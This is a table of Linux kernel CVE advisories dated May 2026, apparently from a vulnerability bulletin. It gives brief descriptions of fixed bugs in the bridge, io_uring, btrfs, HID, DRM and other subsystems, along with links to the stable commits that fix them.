| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bridge: guard local VLAN-0 FDB helpers against NULL vlan group When CONFIG_BRIDGE_VLAN_FILTERING is not set, br_vlan_group() and nbp_vlan_group() return NULL (br_private.h stub definitions). The BR_BOOLOPT_FDB_LOCAL_VLAN_0 toggle code is compiled unconditionally and reaches br_fdb_delete_locals_per_vlan_port() and br_fdb_insert_locals_per_vlan_port(), where the NULL vlan group pointer is dereferenced via list_for_each_entry(v, &vg->vlan_list, vlist). The observed crash is in the delete path, triggered when creating a bridge with IFLA_BR_MULTI_BOOLOPT containing BR_BOOLOPT_FDB_LOCAL_VLAN_0 via RTM_NEWLINK. The insert helper has the same bug pattern. Oops: general protection fault, probably for non-canonical address 0xdffffc0000000056: 0000 [#1] KASAN NOPTI KASAN: null-ptr-deref in range [0x00000000000002b0-0x00000000000002b7] RIP: 0010:br_fdb_delete_locals_per_vlan+0x2b9/0x310 Call Trace: br_fdb_toggle_local_vlan_0+0x452/0x4c0 br_toggle_fdb_local_vlan_0+0x31/0x80 net/bridge/br.c:276 br_boolopt_toggle net/bridge/br.c:313 br_boolopt_multi_toggle net/bridge/br.c:364 br_changelink net/bridge/br_netlink.c:1542 br_dev_newlink net/bridge/br_netlink.c:1575 Add NULL checks for the vlan group pointer in both helpers, returning early when there are no VLANs to iterate. This matches the existing pattern used by other bridge FDB functions such as br_fdb_add() and br_fdb_delete(). | 2026-05-06 | not yet calculated | CVE-2026-43100 | https://git.kernel.org/stable/c/fb612d436ff0317659e45a91c25fd7d9516f5b1b https://git.kernel.org/stable/c/ddf0ec2d600e7dad62b89692749534d7900a732a https://git.kernel.org/stable/c/1979645e1842cb7017525a61a0e0e0beb924d02a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: airoha: Fix memory leak in airoha_qdma_rx_process() If an error occurs on the subsequents buffers belonging to the non-linear part of the skb (e.g. due to an error in the payload length reported by the NIC or if we consumed all the available fragments for the skb), the page_pool fragment will not be linked to the skb so it will not return to the pool in the airoha_qdma_rx_process() error path. Fix the memory leak partially reverting commit 'd6d2b0e1538d ("net: airoha: Fix page recycling in airoha_qdma_rx_process()")' and always running page_pool_put_full_page routine in the airoha_qdma_rx_process() error path. | 2026-05-06 | not yet calculated | CVE-2026-43102 | https://git.kernel.org/stable/c/4429b761874fb9c7767d12d98913a467ef2654f1 https://git.kernel.org/stable/c/7ee0063fbab8aea8f4e4e3165f541bf898b77b80 https://git.kernel.org/stable/c/285fa6b1e03cff78ead0383e1b259c44b95faf90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: lapbether: handle NETDEV_PRE_TYPE_CHANGE lapbeth_data_transmit() expects the underlying device type to be ARPHRD_ETHER. Returning NOTIFY_BAD from lapbeth_device_event() makes sure bonding driver can not break this expectation. | 2026-05-06 | not yet calculated | CVE-2026-43103 | https://git.kernel.org/stable/c/363a38044b8cd5b496d241651a1fb666e7c5fe3e https://git.kernel.org/stable/c/328bb2cff5c2ed973f595ded769e15f4b7a117be https://git.kernel.org/stable/c/63851f60781aa89258c8f0952cd13940aab0888e https://git.kernel.org/stable/c/b117056768ab7deb434e7d72065e48d2083a0c2a https://git.kernel.org/stable/c/b120e4432f9f56c7103133d6a11245e617695adb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vc4: Fix a memory leak in hang state error path When vc4_save_hang_state() encounters an early return condition, it returns without freeing the previously allocated `kernel_state`, leaking memory. Add the missing kfree() calls by consolidating the early return paths into a single place. | 2026-05-06 | not yet calculated | CVE-2026-43104 | https://git.kernel.org/stable/c/dd5c49787a32da96a2b154427eb17cbf12a83c28 https://git.kernel.org/stable/c/d8fdd6adc07b78ad3e9ee0004876d90cb59ca941 https://git.kernel.org/stable/c/e352e9adc9f6df54d63150ff832f71c04e30744b https://git.kernel.org/stable/c/3eb7dd55021d0f4308fbea0bea21d2118984d8e7 https://git.kernel.org/stable/c/9525d169e5fd481538cf8c663cc5839e54f2e481 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vc4: Fix memory leak of BO array in hang state The hang state's BO array is allocated separately with kzalloc() in vc4_save_hang_state() but never freed in vc4_free_hang_state(). Add the missing kfree() for the BO array before freeing the hang state struct. | 2026-05-06 | not yet calculated | CVE-2026-43105 | https://git.kernel.org/stable/c/a812008fe3a0aebb778d277b35717f64e23d0302 https://git.kernel.org/stable/c/0d3c014a84396a147705f523a8fd6fc873e76502 https://git.kernel.org/stable/c/421cea4f71f7cf65abaae878562ee4aa2b684628 https://git.kernel.org/stable/c/b8138567c4a80fd76a647849ebd4284996cf4b17 https://git.kernel.org/stable/c/f4dfd6847b3e5d24e336bca6057485116d17aea4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: account XFRMA_IF_ID in aevent size calculation xfrm_get_ae() allocates the reply skb with xfrm_aevent_msgsize(), then build_aevent() appends attributes including XFRMA_IF_ID when x->if_id is set. xfrm_aevent_msgsize() does not include space for XFRMA_IF_ID. For states with if_id, build_aevent() can fail with -EMSGSIZE and hit BUG_ON(err < 0) in xfrm_get_ae(), turning a malformed netlink interaction into a kernel panic. Account XFRMA_IF_ID in the size calculation unconditionally and replace the BUG_ON with normal error unwinding. | 2026-05-06 | not yet calculated | CVE-2026-43107 | https://git.kernel.org/stable/c/2c41283d94af943a05f7f2cc1a01f0c872f3cf43 https://git.kernel.org/stable/c/e62e322ea20be78e346e4b49f9a6b9f03313af4c https://git.kernel.org/stable/c/58e5735d1a5373652f405a0c16e54ac04aaab0ad https://git.kernel.org/stable/c/7081d46d32312f1a31f0e0e99c6835a394037599 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: qcom: pd-mapper: Fix element length in servreg_loc_pfr_req_ei It looks element length declared in servreg_loc_pfr_req_ei for reason not matching servreg_loc_pfr_req's reason field due which we could observe decoding error on PD crash. qmi_decode_string_elem: String len 81 >= Max Len 65 Fix this by matching with servreg_loc_pfr_req's reason field. | 2026-05-06 | not yet calculated | CVE-2026-43108 | https://git.kernel.org/stable/c/c93ca7c5a72e23a83a0b96f7f5c41a7a72f1dc47 https://git.kernel.org/stable/c/7d75145672cf2ec7c5417e3243af72c48314f7bb https://git.kernel.org/stable/c/cba84132c2ac7c08b215ce4962bc6f522c08a88c https://git.kernel.org/stable/c/641f6fda143b879da1515f821ee475073678cf2a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86: shadow stacks: proper error handling for mmap lock 김영민 reports that shstk_pop_sigframe() doesn't check for errors from mmap_read_lock_killable(), which is a silly oversight, and also shows that we haven't marked those functions with "__must_check", which would have immediately caught it. So let's fix both issues. | 2026-05-06 | not yet calculated | CVE-2026-43109 | https://git.kernel.org/stable/c/c64cebcc5c4f223dbcbe7dcdf74908fc092a0aa4 https://git.kernel.org/stable/c/262b6d38a81d51b135db81e1f30c13d30e38feee https://git.kernel.org/stable/c/52f657e34d7b21b47434d9d8b26fa7f6778b63a0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: srcu: Use irq_work to start GP in tiny SRCU Tiny SRCU's srcu_gp_start_if_needed() directly calls schedule_work(), which acquires the workqueue pool->lock. This causes a lockdep splat when call_srcu() is called with a scheduler lock held, due to: call_srcu() [holding pi_lock] srcu_gp_start_if_needed() schedule_work() -> pool->lock workqueue_init() / create_worker() [holding pool->lock] wake_up_process() -> try_to_wake_up() -> pi_lock Also add irq_work_sync() to cleanup_srcu_struct() to prevent a use-after-free if a queued irq_work fires after cleanup begins. Tested with rcutorture SRCU-T and no lockdep warnings. [ Thanks to Boqun for similar fix in patch "rcu: Use an intermediate irq_work to start process_srcu()" ] | 2026-05-06 | not yet calculated | CVE-2026-43115 | https://git.kernel.org/stable/c/bb37286db65368cb72ba8757ad86299c4e4a73fc https://git.kernel.org/stable/c/a6fc88b22bc8d12ad52e8412c667ec0f5bf055af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix zero size inode with non-zero size after log replay When logging that an inode exists, as part of logging a new name or logging new dir entries for a directory, we always set the generation of the logged inode item to 0. This is to signal during log replay (in overwrite_item()), that we should not set the i_size since we only logged that an inode exists, so the i_size of the inode in the subvolume tree must be preserved (as when we log new names or that an inode exists, we don't log extents). This works fine except when we have already logged an inode in full mode or it's the first time we are logging an inode created in a past transaction, that inode has a new i_size of 0 and then we log a new name for the inode (due to a new hardlink or a rename), in which case we log an i_size of 0 for the inode and a generation of 0, which causes the log replay code to not update the inode's i_size to 0 (in overwrite_item()). An example scenario: mkdir /mnt/dir xfs_io -f -c "pwrite 0 64K" /mnt/dir/foo sync xfs_io -c "truncate 0" -c "fsync" /mnt/dir/foo ln /mnt/dir/foo /mnt/dir/bar xfs_io -c "fsync" /mnt/dir <power fail> After log replay the file remains with a size of 64K. This is because when we first log the inode, when we fsync file foo, we log its current i_size of 0, and then when we create a hard link we log again the inode in exists mode (LOG_INODE_EXISTS) but we set a generation of 0 for the inode item we add to the log tree, so during log replay overwrite_item() sees that the generation is 0 and i_size is 0 so we skip updating the inode's i_size from 64K to 0. Fix this by making sure at fill_inode_item() we always log the real generation of the inode if it was logged in the current transaction with the i_size we logged before. Also if an inode created in a previous transaction is logged in exists mode only, make sure we log the i_size stored in the inode item located from the commit root, so that if we log multiple times that the inode exists we get the correct i_size. A test case for fstests will follow soon. | 2026-05-06 | not yet calculated | CVE-2026-43118 | https://git.kernel.org/stable/c/fddb157536e67a055597f00a8b4922d5f5ed0826 https://git.kernel.org/stable/c/03e966b63df5b06790310c1faaf3e0cb43adea8b https://git.kernel.org/stable/c/5254d4181add9dfaa5e3519edd71cc8f752b2f85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: annotate data-races around hdev->req_status __hci_cmd_sync_sk() sets hdev->req_status under hdev->req_lock: hdev->req_status = HCI_REQ_PEND; However, several other functions read or write hdev->req_status without holding any lock: - hci_send_cmd_sync() reads req_status in hci_cmd_work (workqueue) - hci_cmd_sync_complete() reads/writes from HCI event completion - hci_cmd_sync_cancel() / hci_cmd_sync_cancel_sync() read/write - hci_abort_conn() reads in connection abort path Since __hci_cmd_sync_sk() runs on hdev->req_workqueue while hci_send_cmd_sync() runs on hdev->workqueue, these are different workqueues that can execute concurrently on different CPUs. The plain C accesses constitute a data race. Add READ_ONCE()/WRITE_ONCE() annotations on all concurrent accesses to hdev->req_status to prevent potential compiler optimizations that could affect correctness (e.g., load fusing in the wait_event condition or store reordering). | 2026-05-06 | not yet calculated | CVE-2026-43119 | https://git.kernel.org/stable/c/6e539907c0d11f514c5e0b049b27b04dff48a5b1 https://git.kernel.org/stable/c/a7a1cdb4a64ca74eb95cc46648fccb8cd3f9af27 https://git.kernel.org/stable/c/40734ce8efc34c4a0d0222855798c0dc14b65f2e https://git.kernel.org/stable/c/b6807cfc195ef99e1ac37b2e1e60df40295daa8c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix user_ref race between scrub and refill paths The io_zcrx_put_niov_uref() function uses a non-atomic check-then-decrement pattern (atomic_read followed by separate atomic_dec) to manipulate user_refs. This is serialized against other callers by rq_lock, but io_zcrx_scrub() modifies the same counter with atomic_xchg() WITHOUT holding rq_lock. On SMP systems, the following race exists: CPU0 (refill, holds rq_lock) CPU1 (scrub, no rq_lock) put_niov_uref: atomic_read(uref) - 1 // window opens atomic_xchg(uref, 0) - 1 return_niov_freelist(niov) [PUSH #1] // window closes atomic_dec(uref) - wraps to -1 returns true return_niov(niov) return_niov_freelist(niov) [PUSH #2: DOUBLE-FREE] The same niov is pushed to the freelist twice, causing free_count to exceed nr_iovs. Subsequent freelist pushes then perform an out-of-bounds write (a u32 value) past the kvmalloc'd freelist array into the adjacent slab object. Fix this by replacing the non-atomic read-then-dec in io_zcrx_put_niov_uref() with an atomic_try_cmpxchg loop that atomically tests and decrements user_refs. This makes the operation safe against concurrent atomic_xchg from scrub without requiring scrub to acquire rq_lock. [pavel: removed a warning and a comment] | 2026-05-06 | not yet calculated | CVE-2026-43121 | https://git.kernel.org/stable/c/a94f096e28bfc7975163a6b80f1c8f323efe317a https://git.kernel.org/stable/c/485dc691257b96e6d3bdc25b0eff2daadcc5c46c https://git.kernel.org/stable/c/003049b1c4fb8aabb93febb7d1e49004f6ad653b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPI: processor: Update cpuidle driver check in __acpi_processor_start() Commit 7a8c994cbb2d ("ACPI: processor: idle: Optimize ACPI idle driver registration") moved the ACPI idle driver registration to acpi_processor_driver_init() and acpi_processor_power_init() does not register an idle driver any more. Accordingly, the cpuidle driver check in __acpi_processor_start() needs to be updated to avoid calling acpi_processor_power_init() without a cpuidle driver, in which case the registration of the cpuidle device in that function would lead to a NULL pointer dereference in __cpuidle_register_device(). | 2026-05-06 | not yet calculated | CVE-2026-43122 | https://git.kernel.org/stable/c/68f38f648e4b5bed2aeadd2f711e25302e6490f8 https://git.kernel.org/stable/c/6cfed39c2ce64ac024bbde458a9727105e0b8c66 https://git.kernel.org/stable/c/0089ce1c056aee547115bdc25c223f8f88c08498 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbcon: check return value of con2fb_acquire_newinfo() If fbcon_open() fails when called from con2fb_acquire_newinfo() then info->fbcon_par pointer remains NULL which is later dereferenced. Add check for return value of the function con2fb_acquire_newinfo() to avoid it. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-05-06 | not yet calculated | CVE-2026-43123 | https://git.kernel.org/stable/c/d3e535533767c85788529e626478718b7e95a59f https://git.kernel.org/stable/c/3b5a754ec86bc6064af9aca76eb191c2405e6b0c https://git.kernel.org/stable/c/a785c4e2a999c2d51dfcf40d317cfb30cc735d2c https://git.kernel.org/stable/c/0b038c0be6827dd2dbb1ce4f8d92d97c80cbe9cc https://git.kernel.org/stable/c/11a93180a70bb3095a9bd80d113d9277e30d9959 https://git.kernel.org/stable/c/f57b61624c86ef8f87f6e6b7dd0755de03d90e89 https://git.kernel.org/stable/c/011a0502801c8536f64141a2b61362c14f456544 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pstore: ram_core: fix incorrect success return when vmap() fails In persistent_ram_vmap(), vmap() may return NULL on failure. If offset is non-zero, adding offset_in_page(start) causes the function to return a non-NULL pointer even though the mapping failed. persistent_ram_buffer_map() therefore incorrectly returns success. Subsequent access to prz->buffer may dereference an invalid address and cause crashes. Add proper NULL checking for vmap() failures. | 2026-05-06 | not yet calculated | CVE-2026-43124 | https://git.kernel.org/stable/c/d47234840aeb4182ed3ee795c578b1dfa9cbd25b https://git.kernel.org/stable/c/49918dd52615097529811d21ec6074dd02ebe77c https://git.kernel.org/stable/c/8baa234181f632cabacf73e4834a910859e9fcc9 https://git.kernel.org/stable/c/1da904e84de608907662ad8a51ba9c571d61e003 https://git.kernel.org/stable/c/8d849adfbc3e98417fb541620568db1a759ef441 https://git.kernel.org/stable/c/2c99326dc1c79b7ce3c8dd92929b5ce724ff70eb https://git.kernel.org/stable/c/88d5b28f63c7aac1271784e3b800ed405d1cde75 https://git.kernel.org/stable/c/05363abc7625cf18c96e67f50673cd07f11da5e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: fix circular locking dependency in run_unpack_ex Syzbot reported a circular locking dependency between wnd->rw_lock (sbi->used.bitmap) and ni->file.run_lock. The deadlock scenario: 1. ntfs_extend_mft() takes ni->file.run_lock then wnd->rw_lock. 2. run_unpack_ex() takes wnd->rw_lock then tries to acquire ni->file.run_lock inside ntfs_refresh_zone(). This creates an AB-BA deadlock. Fix this by using down_read_trylock() instead of down_read() when acquiring run_lock in run_unpack_ex(). If the lock is contended, skip ntfs_refresh_zone() - the MFT zone will be refreshed on the next MFT operation. This breaks the circular dependency since we never block waiting for run_lock while holding wnd->rw_lock. | 2026-05-06 | not yet calculated | CVE-2026-43127 | https://git.kernel.org/stable/c/b014372b62237521444ee51384549bdf48b79015 https://git.kernel.org/stable/c/b8d22d9d8260b0f4f4d8e2898c98037c9982ea66 https://git.kernel.org/stable/c/08ce2fee1b869ecbfbd94e0eb2630e52203a2e03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ima: verify the previous kernel's IMA buffer lies in addressable RAM Patch series "Address page fault in ima_restore_measurement_list()", v3. When the second-stage kernel is booted via kexec with a limiting command line such as "mem=<size>" we observe a pafe fault that happens. BUG: unable to handle page fault for address: ffff97793ff47000 RIP: ima_restore_measurement_list+0xdc/0x45a #PF: error_code(0x0000) not-present page This happens on x86_64 only, as this is already fixed in aarch64 in commit: cbf9c4b9617b ("of: check previous kernel's ima-kexec-buffer against memory bounds") This patch (of 3): When the second-stage kernel is booted with a limiting command line (e.g. "mem=<size>"), the IMA measurement buffer handed over from the previous kernel may fall outside the addressable RAM of the new kernel. Accessing such a buffer can fault during early restore. Introduce a small generic helper, ima_validate_range(), which verifies that a physical [start, end] range for the previous-kernel IMA buffer lies within addressable memory: - On x86, use pfn_range_is_mapped(). - On OF based architectures, use page_is_ram(). | 2026-05-06 | not yet calculated | CVE-2026-43129 | https://git.kernel.org/stable/c/f11d7d088f5ed54b31c6735854c12845eb60eb4a https://git.kernel.org/stable/c/9e1f51c1ad57cc76a0e8b5eb27038f8973fff4fa https://git.kernel.org/stable/c/5366ec7d2f793ce703c403d7fd4c25a3db365b9d https://git.kernel.org/stable/c/10d1c75ed4382a8e79874379caa2ead8952734f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Flush dev-IOTLB only when PCIe device is accessible in scalable mode Commit 4fc82cd907ac ("iommu/vt-d: Don't issue ATS Invalidation request when device is disconnected") relies on pci_dev_is_disconnected() to skip ATS invalidation for safely-removed devices, but it does not cover link-down caused by faults, which can still hard-lock the system. For example, if a VM fails to connect to the PCIe device, "virsh destroy" is executed to release resources and isolate the fault, but a hard-lockup occurs while releasing the group fd. Call Trace: qi_submit_sync qi_flush_dev_iotlb intel_pasid_tear_down_entry device_block_translation blocking_domain_attach_dev __iommu_attach_device __iommu_device_set_domain __iommu_group_set_domain_internal iommu_detach_group vfio_iommu_type1_detach_group vfio_group_detach_container vfio_group_fops_release __fput Although pci_device_is_present() is slower than pci_dev_is_disconnected(), it still takes only ~70 µs on a ConnectX-5 (8 GT/s, x2) and becomes even faster as PCIe speed and width increase. Besides, devtlb_invalidation_with_pasid() is called only in the paths below, which are far less frequent than memory map/unmap. 1. mm-struct release 2. {attach,release}_dev 3. set/remove PASID 4. dirty-tracking setup The gain in system stability far outweighs the negligible cost of using pci_device_is_present() instead of pci_dev_is_disconnected() to decide when to skip ATS invalidation, especially under GDR high-load conditions. | 2026-05-06 | not yet calculated | CVE-2026-43130 | https://git.kernel.org/stable/c/581ce094d9eafb78ec4f9de77bd24b780c151236 https://git.kernel.org/stable/c/e2c78c69f8faf2885ea4ceee08c71ac738f401a0 https://git.kernel.org/stable/c/ead67d0378e90f419e385a43af29435242d80c12 https://git.kernel.org/stable/c/01aed2f1d7cb8fdf4c60c5bb4727608cb82b401d https://git.kernel.org/stable/c/9813306610d0d718c863aaa70928bf57d7570ec0 https://git.kernel.org/stable/c/9deaacc8dcaddb6ddc5b52e1e63b457450ec0f94 https://git.kernel.org/stable/c/0da6697e577023d8867c7beb2d16a22510e4eea9 https://git.kernel.org/stable/c/10e60d87813989e20eac1f3eda30b3bae461e7f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/pm: Fix null pointer dereference issue If SMU is disabled, during RAS initialization, there will be null pointer dereference issue here. | 2026-05-06 | not yet calculated | CVE-2026-43131 | https://git.kernel.org/stable/c/8e035505fa0e5b7c4306fd3f4e27f8e8f5bfad8c https://git.kernel.org/stable/c/1197366cca89a4c44c541ddedb8ce8bf0757993d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm-verity: correctly handle dm_bufio_client_create() failure If either of the calls to dm_bufio_client_create() in verity_fec_ctr() fails, then dm_bufio_client_destroy() is later called with an ERR_PTR() argument. That causes a crash. Fix this. | 2026-05-06 | not yet calculated | CVE-2026-43132 | https://git.kernel.org/stable/c/6283e49af87a9c121bb01e5a64a7fe5706c210bc https://git.kernel.org/stable/c/d3e1f1adc8a0289efe2d2cdc90edb8c6ffe0b5ef https://git.kernel.org/stable/c/5c2217ddb3b7e7ac25f4ebe9061258fc8f1c9167 https://git.kernel.org/stable/c/031f2adc1499b112a39ac316bbab3c80bba16cf2 https://git.kernel.org/stable/c/9b8dc1d327e2928f3da59ced0595d850d31c0936 https://git.kernel.org/stable/c/451cc650e40e8c3222d37877a9e4be0fcaacb9c8 https://git.kernel.org/stable/c/b154a868a3856fb5216c4f82981d8a503832e095 https://git.kernel.org/stable/c/119f4f04186fa4f33ee6bd39af145cdaff1ff17f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: cx23885: Add missing unmap in snd_cx23885_hw_params() In error path, add cx23885_alsa_dma_unmap() to release the resource acquired by cx23885_alsa_dma_map(). | 2026-05-06 | not yet calculated | CVE-2026-43135 | https://git.kernel.org/stable/c/fda46c9025b755ea50a969b960f333be62421b71 https://git.kernel.org/stable/c/0b7f56084cc3d7766bf274b71cd14cc9674b76bf https://git.kernel.org/stable/c/505630dd1ebf4b53d3f2866c057ddd93157a24d8 https://git.kernel.org/stable/c/544215cc37d032ccaf1919852c05e2439a4d7540 https://git.kernel.org/stable/c/9c0a6ff538660c36a98081916a24f08d55a91331 https://git.kernel.org/stable/c/9544b73cad4ee667fed6a60f71570c58a870a735 https://git.kernel.org/stable/c/fc4df593a8ffded2f77d69a73ecb51d364932ca5 https://git.kernel.org/stable/c/141c81849fab2ad4d6e3fdaff7cbaa873e8b5eb2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: logitech-hidpp: Check maxfield in hidpp_get_report_length() Do not crash when a report has no fields. Fake USB gadgets can send their own HID report descriptors and can define report structures without valid fields. This can be used to crash the kernel over USB. | 2026-05-06 | not yet calculated | CVE-2026-43136 | https://git.kernel.org/stable/c/ae81fac9ce81917817d787e6b74e68482d99bdf2 https://git.kernel.org/stable/c/2dc023dbc11b8dfa8afa63242762acd8cddcad03 https://git.kernel.org/stable/c/7f59999fcd699af06ad2aef446a635ea6aa87db3 https://git.kernel.org/stable/c/b74bf7d0d01fa9b53653f58c29aa00772121f6e9 https://git.kernel.org/stable/c/f1ceaaf93ea32d0f2b95c95f784ee155962c52ad https://git.kernel.org/stable/c/1acb28123e57b50d737377f400f57eec889fe5e4 https://git.kernel.org/stable/c/fb1725c0804dbec9dd01c4cb5c9f1f77a69e36dc https://git.kernel.org/stable/c/1547d41f9f19d691c2c9ce4c29f746297baef9e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: Intel: hda: Fix NULL pointer dereference If there's a mismatch between the DAI links in the machine driver and the topology, it is possible that the playback/capture widget is not set, especially in the case of loopback capture for echo reference where we use the dummy DAI link. Return the error when the widget is not set to avoid a null pointer dereference like below when the topology is broken. RIP: 0010:hda_dai_get_ops.isra.0+0x14/0xa0 [snd_sof_intel_hda_common] | 2026-05-06 | not yet calculated | CVE-2026-43137 | https://git.kernel.org/stable/c/10411f1f2c76be67103b1f95822ff629aa25e2aa https://git.kernel.org/stable/c/42068f7dd42b559c4eeae645e1455ff36518866a https://git.kernel.org/stable/c/7750d78b4014902bc0ac03d4bb30faa076a913ab https://git.kernel.org/stable/c/16c589567a956d46a7c1363af3f64de3d420af20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: reset: gpio: suppress bind attributes in sysfs This is a special device that's created dynamically and is supposed to stay in memory forever. We also currently don't have a devlink between it and the actual reset consumer. Suppress sysfs bind attributes so that user-space can't unbind the device because - as of now - it will cause a use-after-free splat from any user that puts the reset control handle. | 2026-05-06 | not yet calculated | CVE-2026-43138 | https://git.kernel.org/stable/c/09d6efc6abd42809956d598906c222ccd1c8ae92 https://git.kernel.org/stable/c/76801c3dfca0ac6339a23e9615b5f23e25b8644c https://git.kernel.org/stable/c/1d7d869f074f98c34fe23f6a56e5f3acc1f95a2b https://git.kernel.org/stable/c/16de4c6a8fe9ff497ca1aba33ef0dbee09f11952 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: magicmouse: Do not crash on missing msc->input Fake USB devices can send their own report descriptors for which the input_mapping() hook does not get called. In this case, msc->input stays NULL, leading to a crash at a later time. Detect this condition in the input_configured() hook and reject the device. This is not supposed to happen with actual magic mouse devices, but can be provoked by imposing as a magic mouse USB device. | 2026-05-06 | not yet calculated | CVE-2026-43140 | https://git.kernel.org/stable/c/db5ba06e7af9325519a03e52fccf4a9e7c1fd9b2 https://git.kernel.org/stable/c/165912d4321c692321c02793068d30700b4e0f1a https://git.kernel.org/stable/c/f6a3860241fbb556fd72332fa31c5e787004413b https://git.kernel.org/stable/c/243e1165eb03aca97d87aafa9c3130593837a1c2 https://git.kernel.org/stable/c/922bd3e498a4b8e445def6e6ffea2ad3682ad516 https://git.kernel.org/stable/c/5bbe266272d86c0657e8253600f3d5b74fb7b2ae https://git.kernel.org/stable/c/36c83c1329dd881f290f7df2feadfb9a21775108 https://git.kernel.org/stable/c/17abd396548035fbd6179ee1a431bd75d49676a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntb: ntb_hw_switchtec: Fix shift-out-of-bounds for 0 mw lut Number of MW LUTs depends on NTB configuration and can be set to zero, in such scenario rounddown_pow_of_two will cause undefined behaviour and should not be performed. This patch ensures that rounddown_pow_of_two is called on valid value. | 2026-05-06 | not yet calculated | CVE-2026-43141 | https://git.kernel.org/stable/c/d652ef399f131fcd5f8f34266167449ee7c9e5b3 https://git.kernel.org/stable/c/5590cd04d6845c01a6bad985a491c58af6fb5389 https://git.kernel.org/stable/c/a11d03d116eef138a7249202bd772c8e61915aec https://git.kernel.org/stable/c/d0559d07afabfddaaded6a61a16154486b956764 https://git.kernel.org/stable/c/2e4d5e8d86a969318340be95470bb76e52392082 https://git.kernel.org/stable/c/a133e3caf844a3f56b6eef89ddaa66115874f6bd https://git.kernel.org/stable/c/1a867d0d79a4a570a33f2f433919ad2bd7a27b67 https://git.kernel.org/stable/c/186615f8855a0be4ee7d3fcd09a8ecc10e783b08 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: gen1: Destroy internal buffers after FW releases After the firmware releases internal buffers, the driver was not destroying them. This left stale allocations that were no longer used, especially across resolution changes where new buffers are allocated per the updated requirements. As a result, memory was wasted until session close. Destroy internal buffers once the release response is received from the firmware. | 2026-05-06 | not yet calculated | CVE-2026-43142 | https://git.kernel.org/stable/c/7cde76db8883ec8a3d1456068079ecadbfb15ca5 https://git.kernel.org/stable/c/d4457f23ac0130240053a34be663f0fade3bb371 https://git.kernel.org/stable/c/1dabf00ee206eceb0f08a1fe5d1ce635f9064338 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mfd: core: Add locking around 'mfd_of_node_list' Manipulating a list in the kernel isn't safe without some sort of mutual exclusion. Add a mutex any time we access / modify 'mfd_of_node_list' to prevent possible crashes. | 2026-05-06 | not yet calculated | CVE-2026-43143 | https://git.kernel.org/stable/c/dcfa679bba02412f2087be21cf06ae88b1f4e0ef https://git.kernel.org/stable/c/e2e7c275f557e2b75e3128f4818063798248774c https://git.kernel.org/stable/c/db131ef9d8980cf60dcac8cf94c036eccf75e5d0 https://git.kernel.org/stable/c/9b02e3fec3a7fcb990b4d3bd3b13d7edf123dca6 https://git.kernel.org/stable/c/45341856ecda1d56689451abd5cf1d1aa57dbe47 https://git.kernel.org/stable/c/20117c92bcf9c11afd64d7481d8f94fdf410726e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: Fix potential kernel oops when probe fails When probe of the sdio brcmfmac device fails for some reasons (i.e. missing firmware), the sdiodev->bus is set to error instead of NULL, thus the cleanup later in brcmf_sdio_remove() tries to free resources via invalid bus pointer. This happens because sdiodev->bus is set 2 times: first in brcmf_sdio_probe() and second time in brcmf_sdiod_probe(). Fix this by chaning the brcmf_sdio_probe() function to return the error code and set sdio->bus only there. | 2026-05-06 | not yet calculated | CVE-2026-43144 | https://git.kernel.org/stable/c/64ccb0aac41c5055780c2a58bbe2c1b362ceccde https://git.kernel.org/stable/c/379aac7ee8240848aa35f605b06addb4617c863e https://git.kernel.org/stable/c/243307a0d1b0d01538e202c00454c28b21d4432e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: remoteproc: imx_rproc: Fix invalid loaded resource table detection imx_rproc_elf_find_loaded_rsc_table() may incorrectly report a loaded resource table even when the current firmware does not provide one. When the device tree contains a "rsc-table" entry, priv->rsc_table is non-NULL and denotes where a resource table would be located if one is present in memory. However, when the current firmware has no resource table, rproc->table_ptr is NULL. The function still returns priv->rsc_table, and the remoteproc core interprets this as a valid loaded resource table. Fix this by returning NULL from imx_rproc_elf_find_loaded_rsc_table() when there is no resource table for the current firmware (i.e. when rproc->table_ptr is NULL). This aligns the function's semantics with the remoteproc core: a loaded resource table is only reported when a valid table_ptr exists. With this change, starting firmware without a resource table no longer triggers a crash. | 2026-05-06 | not yet calculated | CVE-2026-43145 | https://git.kernel.org/stable/c/91baf24d972ea3c04a75dd18821c03d223c0dbc0 https://git.kernel.org/stable/c/fcec79b6a3649ae7b1f659267602ca402c240d6e https://git.kernel.org/stable/c/9bd98d088f47153a81a6ec8162b4415c64aa7f39 https://git.kernel.org/stable/c/65379adf7d231c930572db45933ff4538f4c5128 https://git.kernel.org/stable/c/500778df9e4c313190368908ff40c23948508e97 https://git.kernel.org/stable/c/198c629bd03863591f3fbf5ce8ff974a33f13dc9 